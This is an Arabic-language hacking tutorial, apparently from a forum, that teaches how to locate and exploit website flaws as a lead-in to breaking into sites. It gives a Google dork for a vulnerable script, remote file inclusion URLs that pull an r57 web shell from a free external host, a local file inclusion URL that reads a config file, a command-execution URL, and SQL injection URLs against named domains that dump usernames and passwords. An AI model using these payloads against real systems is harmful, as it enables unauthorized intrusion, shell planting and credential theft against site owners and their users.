كيف الاحوال جميعا
درس اليوم بشرح فيه بعض الثغرات
اللي تفيدنا لما نجي نستهدف موقع
ونلقي فيه الثغرة نعرف ايه هي وايه استثمارها
اولا نجي للثغرة المألوفه
remote file include
remote يعني تحكم
file يعني ملف
include يعني تشمل
اختصاراها r f i
يعني ملف للتحكمـ
ادراج ملف للتحكم
طيب للتحكم في ايه
اقولك في الموقع اللي عايزين نخترقوا
طيب ايه نوع الملف
بيكون شيل ------ هذ الشيل مرفوع علي استضافه بصيغة txt يتم ربطه بالموقع عن طريق الثغرة
للتحكم في الموقع والسيرفر كامل
---------------------
اوكـ نجيب ثغرة نطبق عليها
Dork:
كود:
"Powered by Kmita Tell Friend" "allinurl:/kmitat/"
..................................
طيب dork للي ما يعرفها يعني كود البحث عن الثغرة في مواقع البحث
واللي تحتها هذا هو الكود اللي بنبحث عنوا في غوغل مثلا حتي نري المواقع المصابه به
نجي للاستثمار او الاستغلال
بعض الكلمات اللي لما تراها تعرف انها استغلال
Example:
Expl:
Exploit:
Exploits:
Expl
كود:
http://www.xxx.com/kmitam/htmlcode.p...ttp://xxx.com/ txt?
نشرح المثال اللي فوق
http://www.xxx.com عنوان الموقع
ممكن يكون مكتوب في الثغر
kmitam الاسكريبت المصاب
= لادراج الشيل
http://xxx.com/txt?؟
شيل لو تلاحظون علامة ال بأخر الشيل
حتي يتم طلب الملف ولابد من وجودها
طيب معانا الثغرة كيف نشغلها ونجيب من الاخر اقولكـ
كود:
http://[url]/kmitam/htmlcode.php?file=http://[shll]/ txt?
ثغرة الفايل انكلود بتسمح لنا بأدراج شيل علي الموقع المصاب بها
يعني لو انا عندي موقع اسموا www.vbsilver.com
مركب به اسكريبت اسموا phpp هذا السكريبت به ثغرة من نوع ريموت فايل انكلود
استغلالها = ?index.php?gap=shll
طيب عشان اطبقها علي موقعي
كود:
www.vbsilver.com/index.php?gap=http://silveeer79.jeeran.com/r57.tx
t?
وهذا شيل روسي رافعوا علي استضافه مجانيه بصيغة txt
'طيب فيه عندنا شيل روسي c99
وشيل r57
وشل sniper-sa وشيلات كتيرة
-Local File Include
او ...Remote File Disclosure
اختصارها lfi
طبعا هي شبيهه بالفايل انكلود
لكنها تسمح بادراج وقراءة الملفات علي السيرفر المصاب بالثغرة
بتكون زي كدا
http://localhost/script/index.php?lfi
يعني رابط الموقع + السكريبت المصاب + الملف المصاب + تطيبق الاوامر
مثلا احنا عندنا ع الموقع داله اسمها get وعايزين نقرا الكونفيق تبعها
بيكون استغلالها زي كذا
http://localhost/mkportal/index.php?get=config.php
بمعني ان احنا امرنا السيرفر يقري لنا الكونفيق الموجود بملف get الموجود بالاسكريبت mkportal
النوع الثالث
remote command execution
عملها تطبيق الاوامر علي السيرفر مباشرة
طبعا راح نخصص دروس لاوامر اللينكس
مثال عليها
كود:
http://www.xxx.com/index.php?cmd=dir
نشرح المثال
هذا الموقع مصاب بثغرة الكوماند
استغلالها بيكون عرض اوامر اللينكس مباشرة علي الموقع المصاب
وهنا امرنا السيرفر بأحضار الملفات والمجلدات للموقع بالامر dir
بأمكاننا أمرة باي اوامر
النوع الرابع
Upload Shell
وهي ثغرة مراكز التحميل
ان وجدت بأمكاننا رفع ملفات خبيثه بصيغة php يعني نرفع الشيل ونضحك علي الموقع
ثغرة سهلها ولا تحتاج شرح 
لكن بشرحها بالتفصيل فيما بعد
النوع الخامس
Remote SQL Injection
ثغرات خطيرة وانتشرت بكثرة هذة الايام
لان اغلب مبرمجين php يكتبون الان دوالهم بالسكيول والاتصال مع قواعد البيانات
ومهمتها سحب اليوزرات وقراءة الملفات
يعني حسب الثغرة المكتشفه بيكون النتيجه ممكن تجيب لنا باسورد المدير
مثال لها
http://www.milw0rm.com/exploits/6350
وهذا دورك البحث
d0rk :: "use your mind"
وهذا الاستغلال
كود:
http://www.ajhyip.com/demo/prime/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/*
او
كود:
http://www.ajhyip.com/demo/acme/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/*
طبعا بتضع الموقع المصاب
واضغط اوكـ
وهو بيطلع لك اليوزر نيمـ والباسورد اذا كان الموقع مصاب
تمني ما يكون فيه غموض
هذا شرح مبسط لبعض الثغرات اللي راح تقابلك كتير
وضعتوا لكمـ قبل ان ابدأ باستهداف اختراق المواقع
حتي نعرف ازاي نستغل اي ثغرة في الاختراق
----------------
راجع الدرس اكتر من مرة فهو مدخلك للدر س القادمـ
